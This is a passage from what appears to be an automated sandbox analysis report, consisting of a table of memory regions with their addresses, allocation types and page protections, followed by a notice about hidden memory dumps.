|
stack
|
page read and write
|
||
|
2AD517C1000
|
trusted library allocation
|
page read and write
|
||
|
D8F000
|
stack
|
page read and write
|
||
|
2AD3F540000
|
heap
|
page read and write
|
||
|
6F0B000
|
stack
|
page read and write
|
||
|
250E0000
|
trusted library allocation
|
page read and write
|
||
|
2520C000
|
stack
|
page read and write
|
||
|
6B91000
|
heap
|
page read and write
|
||
|
2AD4205D000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C18D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C1820000
|
trusted library allocation
|
page read and write
|
||
|
22FF0000
|
trusted library allocation
|
page read and write
|
||
|
7070000
|
trusted library allocation
|
page read and write
|
||
|
25057000
|
trusted library allocation
|
page read and write
|
||
|
420000
|
heap
|
page read and write
|
||
|
AE2EFFC000
|
stack
|
page read and write
|
||
|
500000
|
heap
|
page read and write
|
||
|
AE2F43E000
|
stack
|
page read and write
|
||
|
7DF4EE540000
|
trusted library allocation
|
page execute and read and write
|
||
|
6E60000
|
trusted library allocation
|
page read and write
|
||
|
80E0000
|
direct allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
252FD000
|
trusted library allocation
|
page read and write
|
||
|
803E000
|
stack
|
page read and write
|
||
|
2AD3F6E6000
|
heap
|
page read and write
|
||
|
2AD41CB9000
|
trusted library allocation
|
page read and write
|
||
|
7618000
|
heap
|
page read and write
|
||
|
216C55F8000
|
heap
|
page read and write
|
||
|
25550000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
22F38000
|
trusted library allocation
|
page read and write
|
||
|
2AD41750000
|
heap
|
page execute and read and write
|
||
|
7090000
|
trusted library allocation
|
page read and write
|
||
|
3280000
|
trusted library allocation
|
page read and write
|
||
|
250E0000
|
trusted library allocation
|
page read and write
|
||
|
7BC8000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
22FF0000
|
trusted library allocation
|
page read and write
|
||
|
5EE000
|
stack
|
page read and write
|
||
|
22BDF000
|
stack
|
page read and write
|
||
|
7FF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
25EAD000
|
stack
|
page read and write
|
||
|
1A8000
|
stack
|
page read and write
|
||
|
252EA000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
6780000
|
direct allocation
|
page read and write
|
||
|
2AD3F5F0000
|
heap
|
page read and write
|
||
|
250E0000
|
trusted library allocation
|
page read and write
|
||
|
2AD3F570000
|
heap
|
page read and write
|
||
|
4998000
|
trusted library allocation
|
page read and write
|
||
|
75C5000
|
heap
|
page read and write
|
||
|
22E9E000
|
stack
|
page read and write
|
||
|
7FF7C1A10000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7F0A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AD41D15000
|
trusted library allocation
|
page read and write
|
||
|
7A80000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7F2E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
65C000
|
heap
|
page read and write
|
||
|
7AA0000
|
trusted library allocation
|
page read and write
|
||
|
2574D000
|
stack
|
page read and write
|
||
|
2AD59C4C000
|
heap
|
page read and write
|
||
|
74F000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
22BE0000
|
heap
|
page read and write
|
||
|
4C3B000
|
trusted library allocation
|
page read and write
|
||
|
430000
|
heap
|
page read and write
|
||
|
25510000
|
trusted library allocation
|
page read and write
|
||
|
7FE0000
|
trusted library allocation
|
page read and write
|
||
|
7A9000
|
trusted library allocation
|
page read and write
|
||
|
250E0000
|
trusted library allocation
|
page read and write
|
||
|
25850000
|
trusted library allocation
|
page read and write
|
||
|
22D80000
|
direct allocation
|
page read and write
|
||
|
23090000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1B60000
|
trusted library allocation
|
page read and write
|
||
|
251C8000
|
stack
|
page read and write
|
||
|
2AD59D45000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
225B0000
|
direct allocation
|
page read and write
|
||
|
2AD3F550000
|
heap
|
page read and write
|
||
|
7FF7C1A40000
|
trusted library allocation
|
page read and write
|
||
|
8090000
|
trusted library allocation
|
page execute and read and write
|
||
|
22FF1000
|
trusted library allocation
|
page read and write
|
||
|
750000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
230D8000
|
trusted library allocation
|
page read and write
|
||
|
AE2E9FE000
|
stack
|
page read and write
|
||
|
E5E000
|
stack
|
page read and write
|
||
|
7591000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
2528C000
|
stack
|
page read and write
|
||
|
73A0000
|
heap
|
page read and write
|
||
|
250C0000
|
trusted library allocation
|
page read and write
|
||
|
EF5000
|
heap
|
page execute and read and write
|
||
|
25310000
|
heap
|
page read and write
|
||
|
53A1000
|
trusted library allocation
|
page read and write
|
||
|
43A1000
|
trusted library allocation
|
page read and write
|
||
|
2AD3F6E8000
|
heap
|
page read and write
|
||
|
3263000
|
trusted library allocation
|
page execute and read and write
|
||
|
E1F000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7BE4000
|
heap
|
page read and write
|
||
|
23020000
|
trusted library allocation
|
page read and write
|
||
|
6D90000
|
trusted library allocation
|
page read and write
|
||
|
25570000
|
trusted library allocation
|
page read and write
|
||
|
6C90000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
4FFD000
|
remote allocation
|
page execute and read and write
|
||
|
6E80000
|
trusted library allocation
|
page read and write
|
||
|
700D000
|
stack
|
page read and write
|
||
|
C3131FF000
|
unkown
|
page read and write
|
||
|
250E0000
|
trusted library allocation
|
page read and write
|
||
|
C0E000
|
stack
|
page read and write
|
||
|
7BB0000
|
heap
|
page read and write
|
||
|
AE2FE8F000
|
stack
|
page read and write
|
||
|
2AD4169E000
|
heap
|
page read and write
|
||
|
2AD41C66000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C18C0000
|
trusted library allocation
|
page read and write
|
||
|
44FC000
|
trusted library allocation
|
page read and write
|
||
|
3297000
|
trusted library allocation
|
page execute and read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
2AD597E1000
|
heap
|
page read and write
|
||
|
2AD4358D000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
790000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
23040000
|
heap
|
page execute and read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7FF7C1AD0000
|
trusted library allocation
|
page read and write
|
||
|
C40000
|
trusted library allocation
|
page execute and read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
610000
|
heap
|
page read and write
|
||
|
225D0000
|
direct allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
6D60000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
25361000
|
heap
|
page read and write
|
||
|
250E0000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7615000
|
heap
|
page read and write
|
||
|
328A000
|
trusted library allocation
|
page execute and read and write
|
||
|
650000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
22E17000
|
stack
|
page read and write
|
||
|
2AD43809000
|
trusted library allocation
|
page read and write
|
||
|
2532B000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
67B0000
|
direct allocation
|
page read and write
|
||
|
2AD43083000
|
trusted library allocation
|
page read and write
|
||
|
22FF0000
|
trusted library allocation
|
page read and write
|
||
|
23089000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
250E0000
|
trusted library allocation
|
page read and write
|
||
|
6D73000
|
heap
|
page read and write
|
||
|
22FD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
2AD4163C000
|
heap
|
page read and write
|
||
|
780000
|
trusted library allocation
|
page read and write
|
||
|
AE3000B000
|
stack
|
page read and write
|
||
|
25550000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
6D81000
|
heap
|
page read and write
|
||
|
2AD59D26000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
2AD415E0000
|
heap
|
page read and write
|
||
|
2AD41FE8000
|
trusted library allocation
|
page read and write
|
||
|
9EFD000
|
direct allocation
|
page execute and read and write
|
||
|
250E0000
|
trusted library allocation
|
page read and write
|
||
|
7A90000
|
trusted library allocation
|
page execute and read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
252DB000
|
trusted library allocation
|
page read and write
|
||
|
2AD51ABA000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7BF8000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
EF0000
|
heap
|
page execute and read and write
|
||
|
6D76000
|
heap
|
page read and write
|
||
|
7E05000
|
trusted library allocation
|
page read and write
|
||
|
22EDC000
|
stack
|
page read and write
|
||
|
7FF7C18F6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7F9E000
|
stack
|
page read and write
|
||
|
250E0000
|
trusted library allocation
|
page read and write
|
||
|
216C55A0000
|
heap
|
page read and write
|
||
|
6E70000
|
trusted library allocation
|
page read and write
|
||
|
22FF0000
|
trusted library allocation
|
page read and write
|
||
|
23030000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7495000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
2AD41127000
|
heap
|
page read and write
|
||
|
6CA9000
|
heap
|
page read and write
|
||
|
252D0000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
94FD000
|
direct allocation
|
page execute and read and write
|
||
|
480000
|
heap
|
page read and write
|
||
|
67A0000
|
direct allocation
|
page read and write
|
||
|
2314E000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
216C58C5000
|
heap
|
page read and write
|
||
|
7C22000
|
heap
|
page read and write
|
||
|
2AD419ED000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
25590000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7A77000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
6CCC000
|
heap
|
page read and write
|
||
|
7FF7C1B40000
|
trusted library allocation
|
page read and write
|
||
|
6F4E000
|
stack
|
page read and write
|
||
|
6E30000
|
trusted library allocation
|
page execute and read and write
|
||
|
D90000
|
heap
|
page execute and read and write
|
||
|
22D5F000
|
stack
|
page read and write
|
||
|
6E50000
|
heap
|
page execute and read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
252F6000
|
trusted library allocation
|
page read and write
|
||
|
250E0000
|
trusted library allocation
|
page read and write
|
||
|
25EEC000
|
stack
|
page read and write
|
||
|
252E2000
|
trusted library allocation
|
page read and write
|
||
|
2AD59CB3000
|
heap
|
page read and write
|
||
|
4D88000
|
trusted library allocation
|
page read and write
|
||
|
2AD4371F000
|
trusted library allocation
|
page read and write
|
||
|
2AD3F6BC000
|
heap
|
page read and write
|
||
|
255A0000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
75CA000
|
heap
|
page read and write
|
||
|
1CE000
|
stack
|
page read and write
|
||
|
675B000
|
stack
|
page read and write
|
||
|
2AD41070000
|
heap
|
page execute and read and write
|
||
|
216C54A0000
|
heap
|
page read and write
|
||
|
80B0000
|
direct allocation
|
page read and write
|
||
|
25510000
|
trusted library allocation
|
page read and write
|
||
|
252DE000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7FF7C1B50000
|
trusted library allocation
|
page read and write
|
||
|
23020000
|
trusted library allocation
|
page read and write
|
||
|
25070000
|
heap
|
page execute and read and write
|
||
|
CAC000
|
stack
|
page read and write
|
||
|
AE2F4BB000
|
stack
|
page read and write
|
||
|
22D1E000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
25515000
|
trusted library allocation
|
page read and write
|
||
|
7647000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
2AD59C68000
|
heap
|
page read and write
|
||
|
7609000
|
heap
|
page read and write
|
||
|
4DB2000
|
trusted library allocation
|
page read and write
|
||
|
67C0000
|
direct allocation
|
page read and write
|
||
|
2AD3F890000
|
heap
|
page read and write
|
||
|
2AD59CF4000
|
heap
|
page read and write
|
||
|
7BDB000
|
heap
|
page read and write
|
||
|
793000
|
trusted library allocation
|
page execute and read and write
|
||
|
25590000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
25510000
|
trusted library allocation
|
page read and write
|
||
|
250E0000
|
heap
|
page read and write
|
||
|
250E0000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
C50000
|
trusted library allocation
|
page read and write
|
||
|
7B70000
|
heap
|
page read and write
|
||
|
4BBE000
|
trusted library allocation
|
page read and write
|
||
|
25590000
|
trusted library allocation
|
page read and write
|
||
|
25510000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7FF7C181D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
25E6C000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
B80000
|
trusted library allocation
|
page read and write
|
||
|
7647000
|
heap
|
page read and write
|
||
|
7FDC000
|
stack
|
page read and write
|
||
|
7B90000
|
trusted library allocation
|
page read and write
|
||
|
2AD51AAB000
|
trusted library allocation
|
page read and write
|
||
|
94F000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7EB000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
AE2ECFE000
|
stack
|
page read and write
|
||
|
C3132FF000
|
stack
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
2532C000
|
heap
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
||
|
2AD4359C000
|
trusted library allocation
|
page read and write
|
||
|
7497000
|
heap
|
page read and write
|
There are 868 hidden memdumps, click here to show them.